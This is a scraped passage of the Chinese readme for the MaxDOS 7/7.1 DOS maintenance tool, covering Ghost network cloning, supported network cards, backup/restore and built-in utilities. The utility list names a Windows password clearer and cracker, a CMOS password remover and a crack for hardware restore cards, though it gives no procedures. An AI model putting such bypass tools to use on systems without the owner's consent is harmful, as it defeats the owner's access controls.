版需要专用网刻服务端支持,要进行网刻前请先下载网刻服务端,并且设置准备好服务端 后方能进行客户端网刻,网刻服务端下载地址 http://pzz.cn/bbs/read.php?tid=50400 关于5.5S版本的以前使用的命令行网刻模式,依然是存在的. 详细请参见此 http://pzz.cn/bbs/read.php?tid=26430 友情提醒:您也可以使用新版的网刻模式和旧版网刻模式结合,实现两批机器一起网刻. 全自动网络刻隆支持的网卡所有系列如下: (带x号的代表为多种型号) 3Com 3C900x/3C905x/3C920x/3C940x/3C2000x 全系列网卡. ADMtek AN983x/AN985x/AN9511x/AN9513x 全系列网卡. AMD PCNet Family 全系列网卡. DAVICOM DM9 全系列网卡. Broadcom 440x 10/100x Broadcom 570x 10/100/1000x 全系列网卡. DEC Digital Semiconductor 21040x/21041x/21143x 全系列网卡. DigitalChina DCN-530TX 系列网卡. VIA Rhine Ix/Rhine IIx 全系列网卡.VIA Networking Gbx 全系列网卡. IC Plus IP100x/IP100A 全系列网卡. IC Plus IP1000x 全系列网卡. Intel PRO/100x/82562EHx/82559ERx/82562x Intel PRO 1000x Marvell Yukon 88E8001/8003/8010/8052/8050/8053/8039/8056 等全系列100M/1000M网卡. RealTek RTL8029/8139/810x/8110SC/RTL8169/8110/RTL8136/810x/8138/8111x 全系列. SiS 900-Basedx SiS190/SIS191x 全系列网卡.包含100M/1000M ULi PCI Fast Ethernet Controller ULi Electronics Inc. 全系列网卡. D-Link DFE-550TX/DGE-530TG/DFE0530tx 全系列网卡. Sundance ST201 全系列网卡 RADTEK RTK8189Cx 全系列网卡. Attansic L1 Gigabit / Attansic L2 全系列网卡. Atheros AR8121/AR8113 全系列网卡. NVIDIA Network controller 全系列网卡. 此项支持的网卡100M及1000M的共约300种,上面并无一一列出,如果您未知您的网卡型号,或 者不确定是否支持您的网卡,请选择此项.MaxDOS会帮您自动辨认出网卡以及自动加载驱动. =============================================================================== 首菜单主选项 C.手动网络刻隆 子菜单选项 A.Packet网卡驱动 7.1 版需要专用网刻服务端支持,要进行网刻前请先下载网刻服务端,并且设置准备好服务端 后方能进行客户端网刻,网刻服务端下载地址 http://pzz.cn/bbs/read.php?tid=50400 关于5.5S版本的以前使用的命令行网刻模式,依然是存在的. 详细请参见此 http://pzz.cn/bbs/read.php?tid=26430 解: MaxDOS 内置PACKET的DOS网卡驱动选项.由于有些网卡使用自动识别网卡功能后 无法识别出网卡或识别不正确,所以此项特意使用为手动选择模式. PACKET网卡共支持以下几种网卡: (如果您的网卡不在此选项中,请使用NDIS驱动) 3C905PKT.com 3Com EtherLink PCI Bus Master Packet Driver (3COM 905) 3C90XPD.COM 3Com Fast EtherLink XL 10/100Mb TX Ethernet NIC (3C90X) E310.COM Adico AE310-TX PCI 10/100 Fast Ethernet Adapter AMDPCNET.com AMD PCnet Family DCN530tx.COM DCN-530TX PCI Ethernet Adapter V1.00 (2002.0411) DFE530TX.COM D-Link DLE-530TX PCI NIC (Rev B) V2.53 (2000.0525) DLE530TX.COM D-Link DFE-530TX PCI NIC V4.10 (2002.0703) IP100PD.COM IC Plus IP100 based Fast Ether Adapter V3.03 (2003.0411) PRO100.COM Intel EtherExpress(tm) PRO/10 & PRO/100B PCI,(已更新,可用) RTL8029.COM Realtek RTL8029(AS) PCI Ethernet NIC 1998 RTL8139.COM Realtek RTL8139 Family PCI Fast Ethernet NIC v3.40 SIS900.EXE SiS 900/7016 PCI Fast Ethernet Adapter V1.15 (2002.0816) VIA.COM VIA Rhine I/II Family Fast Ether Adapter V4.16 (已更新,可用) VIAGB.COM VIA Rhine III 1000M网卡驱动. -------------------------------------------------------------------------------- 子菜单选项 B.NDIS网卡驱动 手动选择NDIS2网卡驱动进行网刻,主要用于驱动某些网卡不能识别问题. -------------------------------------------------------------------------------- 子菜单选项 C/D/E/F/G/H.nVIDIA 1/2/3/4/5/6网卡驱动网刻 理论上本选项支持nVIDIA全部集成的软网卡,但由于本人没有这些条件测试,所以无法确认. 本选项共包含了6个版本的nVIDIA网卡驱动,都是由Max一个一个收集并制作. 我们建议,所有使用nVIDIA主板芯片的用户,如果您使用NDIS无法认出您的网卡或者认出无 法正常网刻的话,请使用此六个选项一个一个测试是否可用. 排列顺序按兼容性排列的,V1-V6,相对来说V1支持大部份的NF4及NF5系列网卡. V2则支持NF1-NF4系列网卡,其它V3-V5支持一些较特殊的PHY软网卡. 您可以一个一个切换测试看哪个与您的主板兼容,则使用哪个.操作方式全部一样的. 7.1 版需要专用网刻服务端支持,要进行网刻前请先下载网刻服务端,并且设置准备好服务端 后方能进行客户端网刻,网刻服务端下载地址 http://pzz.cn/bbs/read.php?tid=50400 关于5.5S版本的以前使用的命令行网刻模式,依然是存在的. 详细请参见此 http://pzz.cn/bbs/read.php?tid=26430 友情提醒:您也可以使用新版的网刻模式和旧版网刻模式结合,实现两批机器一起网刻. =============================================================================== 首菜单主选项 D.备份/还原系统 用于全自动备份与还原系统,安装MaxDOS时会提示您指定一个存放GHOST镜像的文件夹,指定 后会在您指定的位置创建一个MaxBAK的系统隐藏文件夹,如果您删除了该分区的MaxBAK文件 夹将造成全自动备份与还原功能失效.另:该功能默认自动备份为硬盘的第一分区,如果您想 修改备份/还原源或目标,请使用开始菜单-程序-迈思工作室-"MaxDOS控制台"进行设置. =============================================================================== 首菜单主选项 E.访问网络资源 进入此项后,系统会自动帮您加载好网卡驱动,并且设置好连接的协议,而且是全中文菜单, 您可以在进入此项后,直接获得局域网里WINDOWS主机上的共享资源,而且支持读写操作当然 这前提您要开启权限.才能实现写操作,您可以根据菜单里的提示操作,也可以使用如NT主机 上的NET命令来实现连接到共享目录,命令行如: net use z: \\max\f 此命令的意思是将Z: 盘,映射到"Max"主机上的"f"为名称的共享目录.您可以参考NT的NET 命令在NT主机上使用 NET /? 或 NET USE /? 获得帮助,当然可能有个别命令不支持. 友情提醒:您只能通过机器名称来访问您的共享主机,而不能使用IP地址来连接您的主机.而 且您还能使用此项进行网刻操作,映射好如Z:盘 ,然后在GHOST中选择Z:盘共享目录中的 ".GHO" 镜像还原或备份进去. 注意:被访问的机器必须安装IPX协议,已经开启GUEST用户. =============================================================================== 首菜单主选项 F.驱动USB/1394/SATA/CD/PCMCIA/SCSI设备 用来驱动USB/1394/SATA/CD/PCMCIA/SCSI设备,驱动后就可以在DOS下访问设备的内容! =============================================================================== 首菜单主选项 G.纯DOS模式 用于刷BIOS或运行其它特殊软件,不加载任何驱动,无HIMEM,无虚拟盘,不包含常用软件包. ===============================================================================
MaxDOS_71PXE_G115.rar
MaxDOS 7.1 说明文件 关注新版,意见建议请到 Http://MaxDOS.Net 或 Http://Pzz.Cn =============================================================================== 集成DM/PQ版,支持Windows Vista/Server 2008版,U盘版,PXE版,光盘等其它的MaxDos7.1版 本,如果您需要以上版本,请关注我们的网站,感谢您的使用. MaxDOS 7.1 更新如下: 重要改进: 网刻服务端升级为 MAXNGS 2.0 修正网刻服务端同一时间内DHCP只能提供一个IP地址,第二台无汉获得IP地址. 修正DHCP分配 IP时,一台机器分配了两个IP.修正TFTP不能同时传送多个进程. 增加多网段功能,当使用大网段时,可设置超过多少台机器自动跳跃至下一网段,理论支持无 限台客户端,增加方案功能,当首次设置完毕后,方案将自动被保存,下次使用无需再次设置. MAXDOS客户端: 增加新的引导器,主要用于解决某些特殊的主板,或者某些特殊的芯片组引导问题, 特别是针对笔记本无法引导的问题,以及原来7.0 版的启动花屏,或启动重启等现像的修正. 增加对64位操作系统的支持,主要为 64位的VISTA和2008SERVER的支持问题. 增加对繁体中文操作系统的支持,繁体中文操作系统可正常显示繁体文字. 增加软件的兼容性,增加备份目录创建是否成功提示,以免一键还原失效. 改进Realtek TEL8169网卡驱动问题. 增加部份新的网卡驱动. 修正NVDIA自动识别网卡时卡住,改为提示手动加载. 增加NDIS驱动手动选择菜单. 修正自动网刻时,使用手动加载网卡驱动时会报错问题. 收入置顶贴中的网卡驱动收集贴的驱动至12月10日.更新内置的常用软件. 更新控制台为 2.0 可显示引导模式状态,及增加引导器新老版本的切换功能. 友情提示,如果你的主板为NVIDIA芯片组,而不能识别网卡的,请尝试使用手动加NVIDIA驱动. 还有其它功能,未能一一列出. =============================================================================== 软件特色功能如下: 1. 为装好的Win2K/XP/2K3/VISTA/2008系统加入DOS入口,方便维护与备份还原系统. 2. 支持进入DOS时设置密码,密码采用MD5加密,纯绿色软件,不写引导区. 3. 内置200多种网卡驱动,实现GHOST网络刻隆及DOS下访问局域网的共享资源. 4. 全中文的操作方式,让您使用时更简单,支持DOS下显示中文及五笔拼音输入. 5. 完全傻瓜化的网刻模式,让没用过本软件的用户也能轻松实现网刻. 6. 支持引导自已制作IMG镜像,并且支持引导自己制作的无限大小IMG镜像. 7. 全自动化的中文一键恢复/备份,让您备份/恢复系统时更简便. 8. 支持系统盘为NTFS分区,支持读取. 修改. 删除. 复制NTFS分区内容. 9. 内置软件如:NT系统密码清除,DISKGEN. SPFDISK. Ghost等软件. 10.支持DOS驱动SATA. SCSI. 1394. USB. PCMCIA等设置,可直接在DOS下访问. 11.首家独创全面支持nVIDIA全系列网卡网刻,更多精采内容请查阅“说明文件”. =============================================================================== MaxDOS 7.1  使用前注意事项及常见问题: 重要1: 如果您的机器中同时安装了双系统并且有VISTA或2008系统,请勿必在您的VISTA或 2008系统中安装MaxDOS否则可能不能正常启动MaxDOS,请至我们网站下载专用版本. 重要2: 7.1 版需要专用网刻服务端支持,网刻前请先下载网刻服务端,并且设置好服务端后方 能进入客户端网刻,服务端下载及网刻教程地址 http://pzz.cn/bbs/read.php?tid=50400 网刻前请先关闭局域网中的其它DHCP服务器,以免出现IP分配冲突,造成连接不上服务端. 重要3: 7.1 版的Max防病毒功能需要专用的防病毒控制服务端,如果您安装了防病毒客户端后 请至我们的网站 http://pzz.cn/bbs/read.php?tid=50433 中下载专用的防病毒服务端方 能实现防病毒功能,如果您不需要该功能可以控制面板中的添加删除程序中卸载. 重要4: 7.1 版中的Max防病毒功能主要针对网吧或企
MaxDOS & Ghost8.2 7 For Vista/2008
MaxDOS 7 更新如下: 重要改进: 1. 支持繁体操作系统,自动判断是否已经安装过MAXDOS 7如果多次安装不会出现多个菜单项。. 2. 改进网卡检测程序,支持多网卡,支持手动选择网卡驱动,如果驱动失败或无法驱动时可 手动选择驱动.并且支持NVIDIA网卡驱动的自动检测并加载.并且保留原有的NVIDIA的多 个版本驱动,保留原有的手动加载功能. 3. 加入最新的万能网卡驱动,在我的两台机器三个网卡(RTL8139,YUKON8039,VMWARE AMDPC NET)下测试完全可驱动,并能实现网络刻隆 4. 全新自动化网刻模式,全部交由服务端操作,包括全盘网刻,单分区网该,GHOST运行参数, 网络备份等. 5. 全新的网刻服务端,只需点击几下即可完成服务端设置,集成DHCP,TFTP,当你准备好网刻 服务端后,只需到客户端里输入MAXDOS密码默认等待10秒钟后MAXDOS客户端将自动检测 并驱动您的网卡且自动进入等待网该状态,你只需要在服务端上等着按发送即可. 6. 全新的控制台程序,可以随时更改备份分区,还原分区,及时查看备份情况对备份文件进 行操作,对备份文件夹进行保护更改MAXDOS的引导模式等功能. 7. 加入10多种新的Broadcom 1000M网卡驱动,加入DLINK DF530驱动,加入20多种新Marvell Yukon网卡驱动,加入Atheros AR8121/AR8113驱动,加入VNIDIA最新由NVIDIA官方提供的 驱动,修正Attansic L2网卡驱动出错问题. 8. 新版本将加入对 WINDOWS SERVER 2008 的支持,将与VISTA会同一个版本. 9. 升级DISKGEN为最新版,升级系统密码破解器为最新版,支持破解VISTA和2008系统密码. 10. 进行代码优化,及启动优化在启动上有明显提升,修正一些已知的小问题. =============================================================================== 软件特色功能如下: 1. 为装好的Win2K/XP/2K3/VISTA/2008系统加入DOS入口,方便维护与备份还原系统. 2. 支持进入DOS时设置密码,密码采用MD5加密,纯绿色软件,不写引导区. 3. 内置200多种网卡驱动,实现GHOST网络刻隆及DOS下访问局域网的共享资源. 4. 全中文的操作方式,让您使用时更简单,支持DOS下显示中文及五笔拼音输入. 5. 完全傻瓜化的网刻模式,让没用过本软件的用户也能轻松实现网刻. 6. 支持引导自已制作IMG镜像,并且支持引导自己制作的无限大小IMG镜像. 7. 全自动化的中文一键恢复/备份,让您备份/恢复系统时更简便. 8. 支持系统盘为NTFS分区,支持读取. 修改. 删除. 复制NTFS分区内容. 9. 内置软件如:NT系统密码清除,DISKGEN. SPFDISK. Ghost等软件. 10.支持DOS驱动SATA. SCSI. 1394. USB. PCMCIA等设置,可直接在DOS下访问. 11.首家独创全面支持nVIDIA全系列网卡网刻,更多精采内容请查阅“说明文件”. =============================================================================== MaxDOS V7 使用前注意事项及常见问题: 重要1: 如果您的机器中同时安装了双系统并且有VISTA或2008系统,请勿必在您的VISTA或 2008系统中安装MaxDOS否则可能不能正常启动MaxDOS,请至我们网站下载专用版本. 重要2: V7版需要专用网刻服务端支持,网刻前请先下载网刻服务端,并且设置好服务端后方 能进入客户端网刻,服务端下载及网刻教程地址 http://pzz.cn/bbs/read.php?tid=50400 网刻前请先关闭局域网中的其它DHCP服务器,以免出现IP分配冲突,造成连接不上服务端. 重要5: GHOST11依然存在着不会自动分卷问题,这将导致GHOSTSRV上出现不是有效镜像问题 如果你使用手动备份镜像时请加上 -split=2000 参数,格式如 Ghost -split=2000 . 重要6: 如果您的机器运行GHOST时出现进入不了,或者后要等待很久才能出现操作界面问题, 请尝试在运行前加上 -no1394 -nousb -noide参数,格式如 Ghost -no1394 -nousb -noide 重要7: GHOST11制作出的镜像,GHOST83和GHOST82不能识别,也就是说如果你客户机上依然 使用的是GHOST82,您制作网刻镜像时就必须使用GHOST82制作全盘镜像. 6.使用前请务必认真的查阅说明文件,否则造成使用问题,作者不负任何责任. 7.MaxDOS在安装时可以自由的设定密码,安装后无法修改,如果不修改,默认的密码为空. 8.MaxDOS支持 WIN 2K/XP/2003/VISTA/2008,不支持WIN9X/ME,VISTA/2008请下载专用版本. 9.安装MaxDOS时请在解压RAR压缩包后安装,并关闭其它无关程序,避免引起未知的错误. 10.当安装时将启动等待时间设为:0 时,则启动时不会出现MaxDOS的入口选项,相对的系统启 度也会快些,需要进入MaxDOS,请在启动时狂按F8键,等出现WINDOWS菜单时,再按ESC键. 11.如果您有多个硬盘,请将您引导MaxDOS系统的硬盘挂接在IDE1接口上,并设置为第一启动 设备,SATA硬盘如不能启动,请在BIOS中将硬盘的工作模式设置为: Compatible Mode. 12.安装MaxDOS后请勿使用NTFS磁盘压缩功能,否则将损坏MaxDOS,使用时请关闭该功能. 13.如果安装后出现不能启动或者启动一半时定住,请尝试进入BIOS载入默认高级设置后尝试. 14.GHOST手动操作备份/还原系统,使用教程 http://pzz.cn/bbs/read.php?tid=26423 15.GHOST备份后占用空间,找不到备份文件 http://pzz.cn/bbs/read.php?tid=23699 16.GHOST不是有效的GHO镜像解决方法 http://pzz.cn/bbs/read.php?tid=14535 17.GHOST网络刻隆常见问题及经验分享 http://pzz.cn/bbs/read.php?tid=1585 18.制作GHOST镜像到网络服务器 http://pzz.cn/bbs/read.php?tid=10705 19.GHOST全盘镜像制作(全盘备份)教程 http://pzz.cn/bbs/read.php?tid=26435 20.更多常见问题及使用帮助请参见 http://pzz.cn/bbs/read.php?tid=8505 21.卸载本软件,请在 "控制面板->添加删程序->找到MaxDOS点删除! =============================================================================== MaxDOS V7 安装启动后首菜单有7个主选项. 首菜单主选项 A. MaxDOS 工具箱 MaxDOS内置的工具,建议都在此项运行.以下为内置的所有命令及工具的简要介绍. 12.bat 将第一硬盘的资料通过ghost复制到第二硬盘. 21.bat 将第二硬盘的资料通过ghost复制到第一硬盘. Chang.bat 在命令行模式下加载长文件名称的显示支持. Chang /q 退出. CDM.bat 在任何菜单下调用光驱驱动菜单,快速实现加载光驱驱动. Exlan.bat 如果要手动网刻的话.请运行这个解压出dos的pack网卡驱动. Gh.bat MaxDOS下的自动一键备份与还原菜单. Spfdisk.exe 启动管理器+分区管理器,功能强大 Help.bat MaxDOS程序帮助文件. 我在这 ^_^ . Idecd.bat 任何菜单任何位置下快速加载ide光驱驱动. Satacd.bat 任何菜单任何位置下快速加载SATA光驱驱动. Loadiso.bat Dos下载入iso光盘镜像.只能读取.不能引导.但可装2k/xp/2k3系统. 先切换到存放iso的目录.输入 Loadiso Xx.iso (xx为镜像文件名). Uniso.bat 卸载上条命令加载的iso命令. M.bat MaxDOS工具箱的主菜单. Mouse.bat 鼠标驱动程序,如果需要鼠标操作请先运行. Mouse /q 退出支持. Ndisgo.bat 用于旧版本的命令行模式全盘网刻,格式: Ndisgo Xx Ndisgx.bat 用于旧版本的命令行模式单分区网刻,格式: Ndisgx Xx Ngo.bat Ndis2网卡驱动选项下的主网刻菜单. PWD.exe Dos下清除2k/xp/2k3/Vista/2008系统用户密码.支持NTFS分区. Pgo.bat Packet网卡驱动选项下的主网刻菜单. 3c90xgo.bat 3com90x系列pack驱动旧版命令行模式全盘网刻批处理. 3c90xgx.bat 3com90x系列pack驱动旧版命令行模式单分区网刻批处理. 8029go.bat Realtek瑞昱8029系列pack驱动旧版命令行模式全盘网刻批处理. 8029gx.bat Realtek瑞昱8029系列pack驱动旧版命令行模式单分区网刻批处理. 8139go.bat Realtek瑞昱8139系列pack驱动旧版命令行模式全盘网刻批处理. 8139gx.bat Realtek瑞昱8139系列pack驱动旧版命令行模式单分区网刻批处理. Dcn530go.bat Dcn-530tx系列pack驱动旧版命令行模式全盘网刻批处理. Dcn530gx.bat Dcn-530tx系列pack驱动旧版命令行模式单分区网刻批处理. Dfe530go.bat D-link Dfe-530tx系列pack驱动旧版命令行模式全盘网刻批处理. Dfe530gx.bat D-link Dfe-530tx系列pack驱动旧版命令行模式单分区网刻批处理. Dle530go.bat 联想dle530系列pack驱动旧版命令行模式全盘网刻批处理. Dle530gx.bat 联想dle530系列pack驱动旧版命令行模式单分区网刻批处理. Ip100go.bat Ic Plus Ip100系列pack驱动旧版命令行模式全盘网刻批处理. Ip100gx.bat Ic Plus Ip100系列pack驱动旧版命令行模式单分区网刻批处理. Pro100go.bat Intel Pro100系列pack驱动旧版命令行模式全盘网刻批处理. Pro100gx.bat Intel Pro100系列pack驱动旧版命令行模式单分区网刻批处理. Sis900go.bat Sis900系列pack驱动旧版命令行模式全盘网刻批处理. Sis900gx.bat Sis900系列pack驱动旧版命令行模式单分区网刻批处理. T8139go.bat 腾达8139d网卡pack驱动系列旧版命令行模式全盘网刻批处理. T8139gx.bat 腾达8139d网卡pack驱动系列旧版命令行模式分区网刻批处理. Via1go.bat Via 其它网卡系列pack驱动系列旧版命令行模式全盘网刻批处理. Via1gx.bat Via 其它网卡系列pack驱动系列旧版命令行模式分区网刻批处理. Viagbgo.bat Via Rhine Iii系列pack驱动系列旧版命令行模式全盘网刻批处理. Viagbgx.bat Via Rhine Iii系列pack驱动系列旧版命令行模式分区网刻批处理. Viago.bat Via Rhine 1/2系列pack驱动系列旧版命令行模式全盘网刻批处理. Viagx.bat Via Rhine 1/2系列pack驱动系列旧版命令行模式分区网刻批处理. Tw.bat 天汇中文支持程序,tw /s加载dos的中文输入法,tw /q退出中文支持. Usbcd.bat 任何菜单任何位置下快速加载usb光驱驱动. Acopy.com 完全复制文件和目录,包括长文件名及属性.运行前建议运行smartdrv Attrib.com 文件/文件夹属性设置命令. Choice.com 选择命令,返回按键的errorlevel值. Coms.com 一个清除cmos密码和设置的程序. Deltree.com 同时删除目录,子目录及文件的工具.操作时请注意. Device.com 用命令行模式加载 .sys 驱动. Deldev.com 卸载上条命令加载的.sys 驱动. Dready.com 判断驱动器状态,检查光驱中是否有光盘. 软盘是否写保护. Edit.com 相当于记事本. Fakedisk.com 用来解压.img镜像. Find.exe 文本找加工具. Format.com 格式化fat32分区命令. J.com 弹出或关闭光驱门. Label.com 非常小巧的修改磁盘卷标的工具. Mbr.com 磁盘mbr信息备份与还原工具. S.com 关闭计算机. Pkzip.com Zip解压工具. R.com 重新启动计算机. Subst.com 磁盘映射工具. Sys.com 传输msdos 7.01 的引导文件到c盘.使用c盘可以引导到dos. Tree.com 目录树显示工具. Debug.exe 强大的dos下编程命令. Diskgen.exe 强大的dos下中文分区软件.一直用它.Max强烈推荐,强过dm. Fdisk.exe 早期的dos分区命令. Ghost.exe 系统备份还原工具.如果运行了ntfsdos.请用exit退出后再运行. Go.exe 直接跳转至目录,如 Go C:\windows. Mem.exe Dos查看内存占用情况. Mousclip.exe 鼠标剪切板程序. NtfsDOS.bat Ntfs分区读写支持.使用exit退出. Pctool.exe Dos下的类似于win资源管理器 Smartdrv.exe Dos下磁盘缓存程序.加载一下可大提高dos安装系统. Xcopy.exe 强大的复制程序,可复制带文件夹的目录,加载tw后,使用xcopy /? Xdel.exe 类似于winnt下的rd,可删除目录和子目录里文件. Ezcopy.exe 一个国产的免制作镜像直接网刻工具,第一台运行此程序为服务端. Memtest.exe Dos下内存测试程序,请在选项"F 纯DOS模式" 下运行. Crdisk.exe Dos下硬件还原卡通用破解程序. (限加强版) Diskfix.com 分区表修复工具,用于修复受损的分区程序. Pq.bat PQMAGIC硬盘分区分割管理程序. (限加强版) Dm.bat 快速分区DM 9.56万用版. (限加强版) =============================================================================== 首菜单主选项 B. 全自动网络刻隆 为了实现全自动化网刻,程序将在5秒内默认执行此选项,并且自动加载网卡驱动,自动进入 GHOST界面等待服务端发送网刻及其它指令(前提是必须准备并设置好网刻服务端) V7版需要专用网刻服务端支持,要进行网刻前请先下载网刻服务端,并且设置准备好服务端 后方能进行客户端网刻,网刻服务端下载地址 http://pzz.cn/bbs/read.php?tid=50400 关于5.5S版本的以前使用的命令行网刻模式,依然是存在的. 详细请参见此 http://pzz.cn/bbs/read.php?tid=26430 友情提醒:您也可以使用新版的网刻模式和旧版网刻模式结合,实现两批机器一起网刻. 全自动网络刻隆支持的网卡所有系列如下: (带x号的代表为多种型号) 3Com 3C900x/3C905x/3C920x/3C940x/3C2000x 全系列网卡. ADMtek AN983x/AN985x/AN9511x/AN9513x 全系列网卡. AMD PCNet Family 全系列网卡. | DAVICOM DM9 全系列网卡. Broadcom 440x 10/100x | Broadcom 570x 10/100/1000x 全系列网卡. DEC Digital Semiconductor 21040x/21041x/21143x 全系列网卡. DigitalChina DCN-530TX 系列网卡. VIA Rhine Ix/Rhine IIx 全系列网卡. VIA Networking Gbx 全系列网卡. IC Plus IP100x/IP100A 全系列网卡. IC Plus IP1000x 全系列网卡. Intel PRO/100x/82562EHx/82559ERx/82562x | Intel PRO 1000x Marvell Yukon 88E8001/8003/8010/8052/8050/8053/8039/8056 等全系列100M/1000M网卡. RealTek RTL8029/8139/810x/8110SC/RTL8169/8110/RTL8136/810x/8138/8111x 全系列. SiS 900-Basedx | SiS190/SIS191x 全系列网卡.包含100M/1000M ULi PCI Fast Ethernet Controller | ULi Electronics Inc. 全系列网卡. D-Link DFE-550TX/DGE-530TG/DFE0530tx 全系列网卡. Sundance ST201 全系列网卡 |RADTEK RTK8189Cx 全系列网卡. Attansic L1 Gigabit / Attansic L2 全系列网卡. Atheros AR8121/AR8113 全系列网卡. NVIDIA Network controller 全系列网卡. 此项支持的网卡100M及1000M的共约300种,上面并无一一列出,如果您未知您的网卡型号,或 者不确定是否支持您的网卡,请选择此项.MaxDOS会帮您自动辨认出网卡以及自动加载驱动. =============================================================================== 首菜单主选项 C. 手动网络刻隆 子菜单选项 A. Packet网卡驱动 V7版需要专用网刻服务端支持,要进行网刻前请先下载网刻服务端,并且设置准备好服务端 后方能进行客户端网刻,网刻服务端下载地址 http://pzz.cn/bbs/read.php?tid=50400 关于5.5S版本的以前使用的命令行网刻模式,依然是存在的. 详细请参见此 http://pzz.cn/bbs/read.php?tid=26430 解: MaxDOS 内置PACKET的DOS网卡驱动选项.由于有些网卡使用自动识别网卡功能后 无法识别出网卡或识别不正确,所以此项特意使用为手动选择模式. PACKET网卡共支持以下几种网卡: (如果您的网卡不在此选项中,请使用NDIS驱动) 3C905PKT.com 3Com EtherLink PCI Bus Master Packet Driver (3COM 905) 3C90XPD.COM 3Com Fast EtherLink XL 10/100Mb TX Ethernet NIC (3C90X) E310.COM Adico AE310-TX PCI 10/100 Fast Ethernet Adapter AMDPCNET.com AMD PCnet Family DCN530tx.COM DCN-530TX PCI Ethernet Adapter V1.00 (2002.0411) DFE530TX.COM D-Link DLE-530TX PCI NIC (Rev B) V2.53 (2000.0525) DLE530TX.COM D-Link DFE-530TX PCI NIC V4.10 (2002.0703) IP100PD.COM IC Plus IP100 based Fast Ether Adapter V3.03 (2003.0411) PRO100.COM Intel EtherExpress(tm) PRO/10 & PRO/100B PCI,(已更新,可用) RTL8029.COM Realtek RTL8029(AS) PCI Ethernet NIC 1998 RTL8139.COM Realtek RTL8139 Family PCI Fast Ethernet NIC v3.40 SIS900.EXE SiS 900/7016 PCI Fast Ethernet Adapter V1.15 (2002.0816) VIA.COM VIA Rhine I/II Family Fast Ether Adapter V4.16 (已更新,可用) VIAGB.COM VIA Rhine III 1000M网卡驱动. -------------------------------------------------------------------------------- 子菜单选项 B/C/D/E/F/G. nVIDIA 1/2/3/4/5/6网卡驱动网刻 理论上本选项支持nVIDIA全部集成的软网卡,但由于本人没有这些条件测试,所以无法确认. 本选项共包含了6个版本的nVIDIA网卡驱动,都是由Max一个一个收集并制作. 我们建议,所有使用nVIDIA主板芯片的用户,如果您使用NDIS无法认出您的网卡或者认出无 法正常网刻的话,请使用此六个选项一个一个测试是否可用. 排列顺序按兼容性排列的,V1-V6,相对来说V1支持大部份的NF4及NF5系列网卡. V2则支持NF1-NF4系列网卡,其它V3-V5支持一些较特殊的PHY软网卡. 您可以一个一个切换测试看哪个与您的主板兼容,则使用哪个.操作方式全部一样的. V7版需要专用网刻服务端支持,要进行网刻前请先下载网刻服务端,并且设置准备好服务端 后方能进行客户端网刻,网刻服务端下载地址 http://pzz.cn/bbs/read.php?tid=50400 关于5.5S版本的以前使用的命令行网刻模式,依然是存在的. 详细请参见此 http://pzz.cn/bbs/read.php?tid=26430 友情提醒:您也可以使用新版的网刻模式和旧版网刻模式结合,实现两批机器一起网刻. =============================================================================== 首菜单主选项 D. 备份/还原系统 用于全自动备份与还原系统,安装MaxDOS时会提示您指定一个存放GHOST镜像的文件夹,指定 后会在您指定的位置创建一个MaxBAK的系统隐藏文件夹,如果您删除了该分区的MaxBAK文件 夹将造成全自动备份与还原功能失效.另:该功能默认自动备份为硬盘的第一分区,如果您想 修改备份/还原源或目标,请使用开始菜单-程序-迈思工作室-"MaxDOS控制台"进行设置. =============================================================================== 首菜单主选项 E. 访问网络资源 进入此项后,系统会自动帮您加载好网卡驱动,并且设置好连接的协议,而且是全中文菜单, 您可以在进入此项后,直接获得局域网里WINDOWS主机上的共享资源,而且支持读写操作当然 这前提您要开启权限.才能实现写操作,您可以根据菜单里的提示操作,也可以使用如NT主机 上的NET命令来实现连接到共享目录,命令行如: net use z: [url=file://max/f]\\max\f[/url] 此命令的意思是将Z: 盘,映射到"Max"主机上的"f"为名称的共享目录.您可以参考NT的NET 命令在NT主机上使用 NET /? 或 NET USE /? 获得帮助,当然可能有个别命令不支持. 友情提醒:您只能通过机器名称来访问您的共享主机,而不能使用IP地址来连接您的主机.而 且您还能使用此项进行网刻操作,映射好如Z:盘 ,然后在GHOST中选择Z:盘共享目录中的 ".GHO" 镜像还原或备份进去. 注意:被访问的机器必须安装IPX协议,已经开启GUEST用户. =============================================================================== 首菜单主选项 F. 驱动USB/1394/SATA/CD/PCMCIA/SCSI设备 用来驱动USB/1394/SATA/CD/PCMCIA/SCSI设备,驱动后就可以在DOS下访问设备的内容! =============================================================================== 首菜单主选项 G. 纯DOS模式 用于刷BIOS或运行其它特殊软件,不加载任何驱动,无HIMEM,无虚拟盘,不包含常用软件包. ===============================================================================
windows网络管理与配置

6,185

社区成员

60,364

社区内容

发帖
与我相关
我的任务
社区描述
windows网络管理与配置
社区管理员
  • 网络管理与配置社区
加入社区
  • 近7日
  • 近30日
  • 至今

加载中

查看更多榜单
社区公告
暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章